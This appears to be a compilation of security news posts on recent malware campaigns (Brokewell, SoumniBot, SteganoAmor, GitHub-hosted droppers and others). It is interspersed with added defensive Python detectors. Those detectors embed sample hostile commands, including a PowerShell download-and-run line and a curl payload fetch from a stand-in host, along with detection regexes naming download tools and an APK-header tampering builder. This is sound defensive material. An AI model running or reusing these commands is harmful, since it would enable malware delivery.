
Banking Malware "Brokewell" Hacks Android Devices, Steals User Data


Security experts have uncovered a new Android banking trojan called Brokewell, which can record every event on the device, from touches and information shown to text input and programs launched.

The malware is distributed via a fake Google Chrome update that appears while using the web browser. Brokewell is in ongoing development and offers a combination of broad device takeover and remote control capabilities.

Brokewell information

ThreatFabric researchers discovered Brokewell while examining a bogus Chrome update page that dropped a payload, a common approach for tricking unwary users into installing malware.

Looking back at previous campaigns, the researchers discovered that Brokewell had previously been used to target "buy now, pay later" financial institutions (such as Klarna) while masquerading as an Austrian digital authentication tool named ID Austria.

Brokewell's key capabilities include data theft and remote control for attackers.

Data theft 

  • Mimics the login screens of targeted apps to steal credentials (overlay attacks).
  • Uses its own WebView to intercept and collect cookies once the user logs into a legitimate website.
  • Captures the victim's interactions with the device (taps, swipes, and text input) to steal data displayed on or entered into it.
  • Collects hardware and software information about the device.
  • Retrieves call logs.
  • Determines the device's physical location.
  • Captures audio with the device's microphone.

Device Takeover: 

  • The attacker can view the device's screen in real time (screen streaming).
  • Remotely performs touch and swipe gestures on the infected device.
  • Remotely clicks specific screen elements or coordinates.
  • Remotely scrolls within elements and enters text into specific fields.
  • Simulates physical button presses such as Back, Home, and Recents.
  • Remotely wakes the device's screen so that any displayed information can be captured.
  • Sets brightness and volume to zero.

New threat actor and loader

According to ThreatFabric, Brokewell's developer operates under the name Baron Samedit and has been offering tools for checking stolen accounts for at least two years.

The researchers identified another tool, "Brokewell Android Loader," also developed by Samedit. It was hosted on one of Brokewell's command-and-control servers and is used by several threat actors.

Notably, this loader can bypass the restrictions Google introduced in Android 13 and later to prevent side-loaded apps (APKs) from abusing the Accessibility Service.

This bypass has been seen since mid-2022 and became more widespread in late 2023, when dropper-as-a-service (DaaS) operations began offering it as part of their service and malware families built the technique into their own loaders.

As Brokewell shows, loaders that bypass the restrictions on Accessibility Service access for APKs from untrusted sources are now common and widely used in the wild.

Security experts warn that device-control capabilities such as those in the Brokewell banker are in high demand among cybercriminals because they allow fraud to be committed from the victim's own device, defeating fraud evaluation and detection systems.

They expect Brokewell to be improved further and distributed to other threat actors via underground forums as part of a malware-as-a-service (MaaS) operation.

To avoid Android malware infections, do not install apps or app updates from sources other than Google Play, and keep Play Protect enabled. A web page prompting you to install a Chrome update is itself a red flag: Chrome on Android is updated through Google Play, not through a downloaded APK.

Malware Author Lures Child Abusers Into Honeytrap to Extort Them

 

You rarely root for online criminals, but a new malware campaign targeting child exploiters makes it hard to feel sorry for its victims.

Since 2012, threat actors have developed a range of malware and ransomware that impersonates government agencies and warns affected Windows users that they have been caught viewing CSAM. The software tells users they must pay a "fine" to prevent their information from being forwarded to law enforcement.

One of the first "modern" ransomware operations, known as Anti-Child Porn Spam Protection or ACCDFISA, used this extortion strategy, initially locking Windows systems and later encrypting files.

Last week, cybersecurity researcher MalwareHunterTeam shared with BleepingComputer an executable malware sample named "CryptVPN" [VirusTotal] that uses a similar extortion technique. This time, however, the malware author targets people who actively seek out child pornography rather than innocent users.

Security specialists investigated the malware and found that the threat actors posed as UsenetClub, a subscription service offering "uncensored" access to download videos and images from Usenet.

Usenet is an online discussion system in which users post to "newsgroups" they have subscribed to. While Usenet is used for legitimate discussion of many topics, it is also a notorious source of child pornography.

The threat actors built a fraudulent site posing as UsenetClub and offered three subscription tiers for the site's content. The first two were paid subscriptions, at $69.99 per month and $279.99 per year. A third option promised free access if the visitor installed and used the free "CryptVPN" software to access the site.

Clicking the "Download & Install" button downloads a CryptVPN.zip file from the site, which contains a Windows shortcut named "CLICK-HERE-TO-INSTALL".

The shortcut launches PowerShell.exe with a command that downloads the CryptVPN.exe executable, saves it to C:\Windows\Tasks.exe, and runs it. The executable is packed with UPX; once unpacked, it contains a PDB path string showing that the author named the malware "PedoRansom".
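The chain described above (Explorer launches the shortcut, the shortcut launches PowerShell, PowerShell downloads a binary into C:\Windows\Tasks and runs it) leaves a recognisable process-creation trail. The Python below is an added example, not part of the original post, that runs that detection logic over constructed Sysmon-style events; the field names follow Sysmon's Image/ParentImage/CommandLine convention, and the URLs, file names and parent processes in the samples are made up. C:\Windows\Tasks is a directory under C:\Windows that ordinary users can write to, which is why droppers favour it.

```python
import re

# Constructed, Sysmon-style process-creation records (not real telemetry from the
# CryptVPN campaign). Event 0 mimics the behaviour described in the post: a shortcut
# double-clicked in Explorer launches PowerShell, which fetches an executable, writes
# it to C:\Windows\Tasks.exe and starts it.
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": (
            "powershell.exe -w hidden -c \"(New-Object Net.WebClient)"
            ".DownloadFile('http://lure.invalid/CryptVPN.exe','C:\\Windows\\Tasks.exe');"
            " Start-Process 'C:\\Windows\\Tasks.exe'\""
        ),
    },
    {   # benign: a developer running a build script from an IDE (hypothetical parent)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
        "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File .\\build.ps1",
    },
    {   # benign: an admin fetching a file interactively, not from a shortcut
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\WindowsTerminal.exe",
        "CommandLine": "powershell.exe Invoke-WebRequest https://example.com/tool.zip -OutFile C:\\Users\\me\\tool.zip",
    },
]

DOWNLOAD_PRIMITIVE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.I)
WINDOWS_TASKS_DROP = re.compile(r"C:\\Windows\\Tasks(\\|\.exe)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
LAUNCH_IN_SAME_COMMAND = re.compile(r"Start-Process|Invoke-Item|\biex\b|Invoke-Expression", re.I)


def score_event(event):
    """Return the suspicious traits found in one PowerShell process-creation event."""
    if not event["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    cmd = event["CommandLine"]
    reasons = []
    if event["ParentImage"].lower().endswith("explorer.exe"):
        reasons.append("powershell launched from explorer.exe (shortcut or double-click)")
    if DOWNLOAD_PRIMITIVE.search(cmd):
        reasons.append("download primitive in command line")
    if WINDOWS_TASKS_DROP.search(cmd):
        reasons.append("payload written under C:\\Windows\\Tasks")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window requested")
    if LAUNCH_IN_SAME_COMMAND.search(cmd):
        reasons.append("launches something in the same command")
    return reasons


def find_droppers(events, min_hits=3):
    """Flag events that show at least min_hits traits; returns [(index, reasons)]."""
    hits = []
    for idx, event in enumerate(events):
        reasons = score_event(event)
        if len(reasons) >= min_hits:
            hits.append((idx, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in find_droppers(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

A single trait (a download cmdlet, say) is common in legitimate administration, which is why the rule only fires when several traits line up; tune min_hits and the regexes against your own baseline before deploying anything like this.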

The malware does little more than replace the victim's wallpaper with an extortion demand and drop a ransom note named README.TXT on the desktop containing similar demands.

"You were searching for child exploitation and/or child sexual abuse material. You were stupid enough to get hacked," reads the extortion demand. "We have collected all your information, now you must pay us a ransom or your life is over."

The note goes on to say that the victim must pay $500 to the Bitcoin address bc1q4zfspf0s2gfmuu8h5k0679sxgxjkd7aj5e6qyl within ten days or their identity will be leaked. So far, the address has received only about $86 in payments.

Threat actors have long used "sextortion" tactics, such as mass-mailing large numbers of people in an attempt to scare them into paying.

These campaigns were very effective at first, with spammers extorting more than $50,000 per week in early operations. As victims have become more aware of the scam, sextortion no longer yields the same returns.

While this approach is more creative and will frighten many people looking for such material, we doubt many will pay the extortion demand.

Rise In Cybercrime: Dark Web Fueling Credential Attacks

 


In a worrying development, cybercriminals are increasingly turning to credential theft as a lucrative business, aided by the rise of infostealer malware. Over the past three years, these threat actors have compromised millions of personal and corporate devices globally.

The Rise of Infostealer Malware

According to cybersecurity experts at Kaspersky, infostealer malware attacks have surged sevenfold in recent years, with over 10 million devices compromised in 2022 alone. These sophisticated attacks enable hackers to silently collect login credentials and sensitive data from devices, posing a significant cybersecurity threat.

The Lucrative Market for Stolen Credentials

The value of corporate credentials in the cybercrime market has soared, leading to a 643% increase in data theft attacks. Cybercriminals act as initial access brokers, stealing corporate credentials and selling them on dark web forums for substantial profits. Kaspersky researchers highlight various sales models, with prices starting at $10 per log file.

Emerging Dark Web Hubs

Darknet markets have become key enablers of cybercrime, facilitating the sale of stolen credentials and victim profiles to cybercriminal groups. Following the takedown of Genesis Market, new hubs like Kraken Market and DNM Aggregator have emerged, offering seamless payment options via crypto processors.

Regional Impact

Regions like the Asia-Pacific and Latin America have been particularly affected by credential stealing attacks, with millions of credentials stolen from countries like Brazil, India, Colombia, and Vietnam. In Australia, compromised credentials accounted for the majority of cybersecurity incidents, with compromised or stolen credentials implicated in 56% of all incidents.

The Role of Initial Access Brokers

The number of initial access brokers (IABs) operating worldwide has risen significantly, with the APAC region experiencing a particularly sharp increase. These brokers play a critical role in fueling cybercrime operations, selling access to corporate networks and facilitating activities like ransomware attacks.

Despite the perception of cyberattacks as complex operations, many rely on something as simple as a stolen credential. According to the Cybersecurity and Infrastructure Security Agency (CISA), over half of attacks on government and critical infrastructure use valid credentials, and stolen credentials are implicated in 86% of breaches involving web-based platforms. Credential stuffing, in which attackers replay stolen usernames and passwords against other websites, has become increasingly popular because people reuse login details across sites for convenience.

With cybercriminals exploiting vulnerabilities in corporate and personal networks, organisations and individuals must remain a step ahead to protect against this pervasive threat.




Information Stealer Malware Preys on Gamers via Deceptive Cheat Code Baits

 


A new info-stealing malware campaign poses as a game cheat called "Cheat Lab" and promises downloaders a free copy if they convince their friends to install it too. The payload is Redline, one of the most capable information stealers in circulation, which harvests passwords, cookies, autofill data, and cryptocurrency wallet information from infected computers.

Redline is popular among cybercriminals and is distributed through many channels. According to McAfee threat researchers, this new variant uses Lua bytecode to evade detection: the bytecode is injected into legitimate processes for stealth and benefits from just-in-time (JIT) compilation.

The researchers attribute this variant to Redline because it uses a command-and-control server previously associated with that malware. Tests conducted by BleepingComputer, however, found that the sample does not exhibit Redline's typical behaviour, such as stealing browser data, saved passwords, and cookies.

The payloads are hosted at URLs under Microsoft's 'vcpkg' GitHub repository and pose as demonstrations of cheating tools named "Cheat Lab" and "Cheater Pro". When the MSI installer runs, it unpacks two files, compiler.exe and lua51.dll, and drops the malicious Lua bytecode in a file named 'readme.txt'.

The campaign uses an unusual lure to spread further: victims are told they will receive a free, fully licensed copy of the cheating program if they get their friends to install it. To add a layer of legitimacy and to evade detection, the payload is shipped as uncompiled Lua bytecode rather than as an executable.

The installer also includes an activation key, another touch meant to make it look legitimate. Once installed, compiler.exe loads and executes the Lua bytecode, and the same executable sets up persistence by creating scheduled tasks that run at system startup.
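Because the payload is Lua bytecode sitting in a file named readme.txt, a cheap triage check is to look for the Lua chunk header in files whose extension says they are not Lua. The Python below is an added example, not McAfee's tooling or the malware's code, and the sample "directory" is constructed: every Lua bytecode chunk starts with the bytes 0x1B "Lua" followed by a version byte whose two nibbles give the major and minor version (0x51 for Lua 5.1, matching the bundled lua51.dll).

```python
import os

LUA_SIGNATURE = b"\x1bLua"          # first four bytes of every Lua bytecode chunk
EXPECTED_EXTENSIONS = (".lua", ".luac", ".out")   # places where compiled Lua is unremarkable


def lua_bytecode_version(blob):
    """Return the Lua version ('5.1', '5.4', ...) if blob starts with a Lua bytecode
    header, else None. The version byte packs major/minor as two nibbles (0x51 == 5.1)."""
    if len(blob) < 5 or not blob.startswith(LUA_SIGNATURE):
        return None
    version = blob[4]
    return f"{version >> 4}.{version & 0x0F}"


def find_masquerading_bytecode(files):
    """files: mapping of path -> header bytes. Return [(path, version)] for files that
    carry a Lua bytecode header under an extension where nobody expects compiled Lua."""
    suspicious = []
    for path, blob in files.items():
        version = lua_bytecode_version(blob)
        if version and not path.lower().endswith(EXPECTED_EXTENSIONS):
            suspicious.append((path, version))
    return suspicious


def scan_directory(root):
    """Walk a real directory tree and apply the same check, reading only the header."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    files[path] = fh.read(5)
            except OSError:
                continue
    return find_masquerading_bytecode(files)


# Constructed sample 'directory': header bytes only, not real malware content.
SAMPLE_FILES = {
    "readme.txt": b"\x1bLua\x51\x00\x01\x04\x08\x04\x08\x00" + b"\x00" * 16,  # Lua 5.1 chunk posing as text
    "notes.txt": b"Cheat Lab activation instructions\n",
    "script.luac": b"\x1bLua\x51\x00\x01\x04\x08\x04\x08\x00",               # compiled Lua where expected
    "helper.lua": b"print('hi')\n",                                            # plain source, no header
}

if __name__ == "__main__":
    for path, version in find_masquerading_bytecode(SAMPLE_FILES):
        print(f"{path}: Lua {version} bytecode with a non-Lua extension")
```

Pair this with a check for the loader itself (an unsigned compiler.exe next to lua51.dll in a user-writable directory); the bytecode header alone is a strong hint, but the loader plus a scheduled task pointing at it is what distinguishes this campaign from a game that legitimately ships compiled Lua.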

McAfee reports that the malware has a fallback persistence mechanism that copies the three files to a long random path under the Program Files directory. Once active on the infected system, it contacts a C2 server, sends screenshots and system information, and then waits for commands to execute on the host.

Although the initial infection vector is not known precisely, infostealers are typically spread through malvertising, YouTube video descriptions, P2P downloads, and deceptive software download sites. Redline is highly dangerous, so users are urged not to run unsigned executables or download files from untrusted sites.

This attack shows that even seemingly trustworthy sources, such as Microsoft's GitHub repositories, can be abused to distribute malware. BleepingComputer contacted Microsoft about the executables distributed via its GitHub URLs, but the company had not responded as of publication.

Soumnibot Malware Abuses Bugs to Escape Detection


SoumniBot Malware

A new Android banking trojan called 'SoumniBot' uses an unusual obfuscation technique: it exploits weaknesses in the way Android extracts and parses the APK manifest.

This lets SoumniBot bypass standard Android security checks and steal information.
Kaspersky researchers discovered and analyzed the malware, documenting how it abuses Android's manifest extraction and parsing process.

Fooling Android's Parser

Manifest files ('AndroidManifest.xml') live in each app's root directory and declare its components (activities, services, broadcast receivers, content providers), permissions, and other app metadata.

Malicious APKs can use various compression tricks to confuse security tools and evade inspection; Kaspersky analysts found that SoumniBot uses three distinct methods to defeat parser checks, all of which involve manipulating the manifest entry's compression method and size.

How the malware works

First, the APK entry for the manifest uses an invalid compression method value, different from the two values (0 for stored and 8 for Deflate) that Android's 'libziparchive' library expects.

Rather than rejecting the entry, the Android APK parser treats the data as uncompressed because of a flaw, so the APK evades protection and runs on the device while stricter tools choke on it.

The second method misreports the size of the manifest file in the APK, declaring a value larger than the actual size.

Because the file was marked as uncompressed in the previous step, it is copied directly from the archive, and the gap is filled with junk "overlay" data.

According to Kaspersky, this extra data has no direct effect on the device because Android is designed to ignore it, but it plays an important role in misleading code analysis tools.

The third evasion tactic uses extremely long strings as XML namespace names in the manifest; many automated analysis tools lack the capacity to parse them and fail.

Kaspersky has notified Google that APK Analyzer, the official Android analysis tool, cannot handle files that use these evasion techniques.
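The first two tricks can be checked directly from the ZIP container without unpacking the APK. The Python below is an added example, not Kaspersky's tooling or SoumniBot code: it walks the central directory by hand, flags a manifest entry whose compression method is anything other than 0 or 8, cross-checks the local header against the central directory, and flags a declared size that does not match the bytes actually stored. A small builder constructs a minimal APK-like zip and tampers with it so the check can be exercised offline; the long-namespace trick lives inside the binary XML and is not covered here.

```python
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"
CENTRAL_SIG = b"PK\x01\x02"
EOCD_SIG = b"PK\x05\x06"
ANDROID_METHODS = {0, 8}            # stored and Deflate: the only methods the platform expects
MANIFEST = "AndroidManifest.xml"


def central_directory_entries(data):
    """Walk the central directory without zipfile and yield
    (name, method, compressed_size, uncompressed_size, local_header_offset)."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    # EOCD fields after the signature: disk, cd_disk, entries_on_disk, entries, cd_size, cd_offset
    _, _, _, entries, _, cd_offset = struct.unpack_from("<HHHHII", data, eocd + 4)
    pos = cd_offset
    for _ in range(entries):
        if data[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError(f"bad central directory signature at offset {pos}")
        (_, _, _, method, _, _, _, comp_size, uncomp_size,
         name_len, extra_len, comment_len, _, _, _, local_off) = struct.unpack_from(
            "<HHHHHHIIIHHHHHII", data, pos + 4)
        name = data[pos + 46:pos + 46 + name_len].decode("utf-8", "replace")
        yield name, method, comp_size, uncomp_size, local_off
        pos += 46 + name_len + extra_len + comment_len


def audit_manifest(data):
    """Return a list of findings for manifest-entry tricks of the kind described above."""
    findings = []
    for name, method, comp_size, uncomp_size, local_off in central_directory_entries(data):
        if name != MANIFEST:
            continue
        if method not in ANDROID_METHODS:
            findings.append(f"manifest compression method {method:#x} is not 0/8; "
                            "Android will treat the entry as stored")
        if data[local_off:local_off + 4] != LOCAL_SIG:
            findings.append("manifest local header offset does not point at a local header")
            continue
        (_, _, l_method, _, _, _, l_comp, l_uncomp, _, _) = struct.unpack_from(
            "<HHHHHIIIHH", data, local_off + 4)
        if (l_method, l_comp, l_uncomp) != (method, comp_size, uncomp_size):
            findings.append("manifest local header disagrees with central directory")
        if method != 8 and uncomp_size != comp_size:
            findings.append(f"manifest declared size {uncomp_size} differs from the "
                            f"{comp_size} bytes actually stored (overlay padding)")
    return findings


def build_apk(manifest_xml, method_override=None, size_override=None):
    """Build a minimal constructed APK-like zip (not a real app). Optionally patch the
    manifest entry's compression method and declared uncompressed size in both the
    local header and the central directory, mimicking the tampering described above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(MANIFEST, manifest_xml)          # first entry -> first local header
        zf.writestr("classes.dex", b"dex\n035\x00")
    data = bytearray(buf.getvalue())
    local = data.find(LOCAL_SIG)
    central = data.find(CENTRAL_SIG)
    if method_override is not None:
        struct.pack_into("<H", data, local + 8, method_override)     # local: method at +8
        struct.pack_into("<H", data, central + 10, method_override)  # central: method at +10
    if size_override is not None:
        struct.pack_into("<I", data, local + 22, size_override)      # local: uncompressed size at +22
        struct.pack_into("<I", data, central + 24, size_override)    # central: uncompressed size at +24
    return bytes(data)


if __name__ == "__main__":
    tampered = build_apk("<manifest package='example.app'/>", method_override=0x1337, size_override=4096)
    for finding in audit_manifest(tampered):
        print("-", finding)
```

Note that Python's own zipfile raises NotImplementedError when asked to read an entry with an unknown compression method. That is exactly the behaviour that lets such a sample slip past tools which give up on the entry rather than fall back to treating it as stored, as the Android parser does; reading the headers yourself avoids that blind spot.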

The danger of SoumniBot

On activation, SoumniBot sends the infected device's carrier, phone number, and other profile information, and requests its configuration from a hardcoded server address.

It then starts a malicious service that sends stolen data from the victim every 15 seconds and restarts every 16 minutes if interrupted.

The exfiltrated data includes IP addresses, contact lists, account information, SMS messages, photos, videos, and digital certificates used for online banking.

How SoumniBot reaches phones is unknown; possibilities range from distribution via dubious websites and unofficial Android marketplaces to trojanizing legitimate apps in trusted repositories.

Kaspersky has published a short list of indicators of compromise, including malware hashes and two domains used by the operators for command and control.

New SteganoAmor Attacks Employ Steganography to Target Organizations Globally

 


Researchers have uncovered an intricate operation run by the TA558 hacking group, known for its previous focus on the hospitality and tourism sectors. The new campaign, dubbed "SteganoAmor," uses steganography, the technique of concealing malicious code inside seemingly harmless image files, to infiltrate targeted systems worldwide. Positive Technologies, the cybersecurity firm behind the discovery, has identified over 320 instances of the attack affecting organisations across different sectors and countries.


How SteganoAmor Attacks Work

SteganoAmor attacks start with phishing emails carrying seemingly harmless attachments, such as Excel or Word documents. The documents exploit CVE-2017-11882, a memory-corruption flaw in Microsoft Office's Equation Editor that was patched in 2017. When a victim opens the file, it downloads a Visual Basic Script (VBS) from a legitimate-looking source, which in turn fetches a JPG image concealing a base64-encoded payload.
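The simplest way commodity loaders "hide" a payload in a JPG is to append it after the image's end-of-image marker: a viewer shows a normal picture while a script can pull the base64 text off the tail. The article does not say which embedding SteganoAmor uses, so treat that as an assumption. The Python below is an added example, not Positive Technologies' tooling; the sample image and its payload are constructed.

```python
import base64
import re

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
# A run of base64 text long enough to be unlikely by accident. Real payloads are far
# longer; the threshold is kept low so the small constructed sample below triggers it.
BASE64_RUN = re.compile(rb"[A-Za-z0-9+/]{32,}={0,2}")


def trailing_data(image):
    """Bytes that follow the last JPEG end-of-image marker. A well-formed JPEG ends at
    EOI, so anything after it was appended by whoever built the file."""
    if not image.startswith(JPEG_SOI):
        raise ValueError("not a JPEG")
    eoi = image.rfind(JPEG_EOI)
    if eoi < 0:
        raise ValueError("no EOI marker")
    return image[eoi + 2:]


def extract_base64_payloads(image):
    """Decode every long base64 run found after EOI; returns the decoded blobs."""
    payloads = []
    for match in BASE64_RUN.finditer(trailing_data(image)):
        run = match.group(0)
        run += b"=" * (-len(run) % 4)       # restore padding if the author stripped it
        try:
            payloads.append(base64.b64decode(run, validate=True))
        except ValueError:
            continue                         # looked like base64 but was not
    return payloads


# Constructed sample: a minimal JPEG shell (SOI, one empty APP0 segment, EOI) with a
# base64-encoded stand-in payload appended. Not a real SteganoAmor image.
FAKE_PAYLOAD = b"MZ\x90\x00 constructed stand-in for a downloader stub"
SAMPLE_IMAGE = (JPEG_SOI + b"\xff\xe0\x00\x02" + JPEG_EOI
                + b"\n" + base64.b64encode(FAKE_PAYLOAD) + b"\n")

if __name__ == "__main__":
    for blob in extract_base64_payloads(SAMPLE_IMAGE):
        print(len(blob), "bytes:", blob[:8])
```

Using rfind for the EOI marker matters because EXIF thumbnails carry their own SOI/EOI pair inside the file; the appended base64 contains no 0xFF bytes, so the last marker is the real end of the image. A payload hidden in pixel data or in a metadata segment would not be caught by this check.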


Diverse Malware Payloads

The hidden payload serves as a gateway to various malware families, each with distinct functionalities:

1. AgentTesla: A spyware capable of keylogging, credential theft, and capturing screenshots.

2. FormBook: An infostealer malware adept at harvesting credentials, monitoring keystrokes, and executing downloaded files.

3. Remcos: A remote access tool enabling attackers to manage compromised machines remotely, including activating webcams and microphones.

4. LokiBot: Another infostealer focusing on extracting sensitive information from commonly used applications.

5. Guloader: A downloader that delivers secondary payloads while evading antivirus detection.

6. Snake Keylogger: Snake Keylogger is malware designed to steal data by logging keystrokes, capturing screenshots, and harvesting credentials from web browsers.

7. XWorm: A Remote Access Trojan (RAT) that grants attackers remote control over compromised computers to execute commands and access sensitive information.


To evade detection, the final payloads and malicious scripts are often stored in reputable cloud services like Google Drive. Additionally, stolen data is transmitted to compromised FTP servers, masquerading as normal traffic.


Protective Measures

Despite the attack's complexity, defending against SteganoAmor is straightforward. Installing the 2017 Microsoft Office updates that fix CVE-2017-11882 (Microsoft later removed the vulnerable Equation Editor component altogether) neutralises the initial exploit and renders the chain ineffective. Since the next stage is a downloaded VBS script and stolen data leaves over FTP, alerting on Office applications spawning script hosts and restricting outbound FTP from endpoints add useful defence in depth.


Global Impact

While the primary targets seem concentrated in Latin America, the reach of SteganoAmor extends worldwide, posing a significant threat to organisations globally.


As these threats are taking new shape and form, staying aware and implementing timely updates remain crucial defences against cyber threats of any capacity. 


Hackers Use GitHub Search to Deliver Malware

 

Checkmarx, an application security firm, has found threat actors manipulating GitHub search results to infect developers with persistent malware.

As part of the campaign, attackers create fake repositories with popular names and themes and boost their search rankings using automated updates and fake stars.

To avoid detection, the threat actors hid a malicious payload inside Visual Studio project files; it executes malware similar to the Keyzetsu clipper, which targets cryptocurrency wallets. The malware persists on Windows machines through a scheduled task that runs it daily.

The threat actors were observed leveraging GitHub Actions to automatically update the malicious repositories by making minor changes to a file titled 'log', which artificially enhances the repositories' visibility and the possibility of users accessing them. 

Furthermore, the attackers were seen adding fake stars to their repositories from multiple fake accounts, tricking users into believing the repositories are popular and genuine.

“Unsuspecting users, often drawn to the top search results and repositories with seemingly positive engagement, are more likely to click on these malicious repositories and use the code or tools they provide, unaware of the hidden dangers lurking within,” Checkmarx stated. 

The attackers placed their payload in a Visual Studio project file's pre-build event, so it runs automatically during the build. The payload checks the system's IP address to determine whether it is in Russia, downloads further content from URLs chosen according to the victim's country, fetches encrypted files from those URLs, and extracts and runs their contents.
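Pre-build events and Exec tasks are where this kind of payload lives, and they are worth scanning before opening a cloned solution in Visual Studio. The Python below is an added example, not Checkmarx's tooling: it lists every build-time command in a .csproj/.vcxproj (old-style namespaced projects and SDK-style ones, PreBuildEvent-type elements and Exec tasks inside Targets) and flags the ones that invoke script hosts, download tools or encoded commands. The sample project is constructed and its commands are placeholders, not the real campaign's.

```python
import re
import xml.etree.ElementTree as ET

# Things that have no business running before a build: script hosts, download tools,
# decoders and the usual living-off-the-land binaries.
SUSPICIOUS_COMMAND = re.compile(
    r"powershell|pwsh|cmd(\.exe)?\s+/c|certutil|bitsadmin|\bcurl\b|\bwget\b|mshta|rundll32|"
    r"regsvr32|wscript|cscript|-enc(odedcommand)?\b|FromBase64String|DownloadFile|"
    r"Invoke-WebRequest|\biex\b|schtasks", re.I)
EVENT_TAGS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent"}


def _local(tag):
    """Drop the MSBuild XML namespace (old-style .csproj files carry one, SDK-style do not)."""
    return tag.rsplit("}", 1)[-1]


def find_build_hooks(project_xml):
    """Return [(where, command)] for every build-time command in the project file."""
    root = ET.fromstring(project_xml)
    hooks = []
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in EVENT_TAGS:
            cmd = elem.text or ""
            for child in elem:                       # .vcxproj style: <PreBuildEvent><Command>..</Command>
                if _local(child.tag) == "Command" and child.text:
                    cmd = child.text
            if cmd.strip():
                hooks.append((tag, cmd.strip()))
        elif tag == "Target":
            name = elem.get("Name", "?")
            trigger = elem.get("BeforeTargets") or elem.get("AfterTargets") or ""
            for task in elem.iter():
                if _local(task.tag) == "Exec" and task.get("Command"):
                    hooks.append((f"Target {name} {trigger}".strip(), task.get("Command").strip()))
    return hooks


def flag_suspicious(project_xml):
    """Only the hooks whose command matches the suspicious-tool pattern."""
    return [(where, cmd) for where, cmd in find_build_hooks(project_xml)
            if SUSPICIOUS_COMMAND.search(cmd)]


# Constructed sample project: two benign hooks and two that should be flagged.
SAMPLE_CSPROJ = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <PreBuildEvent>powershell -w hidden -enc SQBFAFgA</PreBuildEvent>
    <PostBuildEvent>copy "$(TargetPath)" "$(SolutionDir)out\\"</PostBuildEvent>
  </PropertyGroup>
  <Target Name="Fetch" BeforeTargets="Build">
    <Exec Command="curl -s http://lure.invalid/payload.bin -o %TEMP%\\p.bin" />
  </Target>
  <Target Name="Version" AfterTargets="Build">
    <Exec Command="echo built $(Configuration)" />
  </Target>
</Project>"""

if __name__ == "__main__":
    for where, cmd in flag_suspicious(SAMPLE_CSPROJ):
        print(f"[{where}] {cmd}")
```

Run it over every *.csproj, *.vcxproj and *.targets file in a freshly cloned repository before building; a clean project rarely needs anything but copy, echo or the project's own tools in these hooks, so the list of flagged commands should be short enough to read by hand.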

On April 3, the attackers switched to a new URL pointing to an archived executable. To evade security scanners, they padded the executable with large numbers of zeros, inflating it beyond the size many scanners will process.

"The results of our analysis of this malware suggest that the malware contains similarities to the 'Keyzetsu clipper' malware, a relatively new addition to the growing list of crypto wallet clippers commonly distributed through pirated software," Checkmarx said in a press release.

The malware attempts to stay persistent through a scheduled task that points to a shortcut to the executable. Several of the malicious repositories have received complaints from infected users, suggesting the campaign has been successful.

"In the aftermath of the XZ attack and many other recent incidents, it would be irresponsible for developers to rely solely on reputation as a metric when using open-source code. These incidents highlight the necessity for manual code reviews or the use of specialized tools that perform thorough code inspections for malware," Checkmarx added.

Counting the Cost: $9.2 Trillion Annual Impact of Cybercrime Looms

 


According to a new Statista Market Insights report, cybercrime is rising at an unprecedented pace: its annual cost is projected to reach $9.2 trillion, roughly one-third of the United States' GDP, or about 24 times Apple's annual revenue in 2023. The same report found that cybercrime costs rose 245% between 2018 and 2020, from $860 billion to $2.95 trillion.

The cost nearly doubled again to $5.49 trillion in 2021 and is expected to grow by about $1 trillion per year, reaching $8.15 trillion in 2023. Cybercrime affects not only businesses and governments but everyday people, and has become one of the world's largest illegal economies. Cyberattacks cause financial losses including ransom payments, lost productivity, system downtime, and data theft.

Contributing factors

IoT devices give cybercriminals an ever larger attack surface, increasing the number of potential victims. Mac users are not exempt: Jamf's report found a 50% increase in new Mac malware families in 2023.

Each of these families may contain hundreds of malware samples. As the Mac user base grows, cybercriminals increasingly see it as a worthwhile target. Geopolitics also plays a significant role, with many countries using cyberattacks for strategic advantage, disruption of critical infrastructure, and intelligence gathering.

State-sponsored attacks have escalated sharply amid the conflicts in Ukraine and Israel. At the same time, a skills shortage has left many cybersecurity positions unfilled, making it harder to monitor and defend against specific threats.

The shortage also increases the workload of existing staff, hurting productivity and leading to burnout, which threat actors count on. Ransomware-as-a-service (RaaS) has very few barriers to entry and has become popular thanks to a combination of tough economic conditions, quick financial gains, and the little technical knowledge required.

Under this model, operators develop the software and affiliates pay to use the pre-built tools and packages to launch attacks, typically paying a fee for each attack. Non-programmers who lack the skills to develop and deploy their own ransomware can thus carry out attacks.

RaaS kits are plentiful on the dark web, though not all are of high quality. A simple lack of awareness leaves many individuals and organizations blind to the risks and consequences of cyberattacks and vulnerable to cybercrime. Jamf's annual trends report found that 40% of mobile users and 39% of organizations were running a device with known vulnerabilities.

In light of recent incidents involving a popular Apple device management platform, it is evident that awareness of the security measures needed to protect Macs is lacking. Securing the Mac is essential to guard against threats such as malware and phishing. Here are some essential steps:

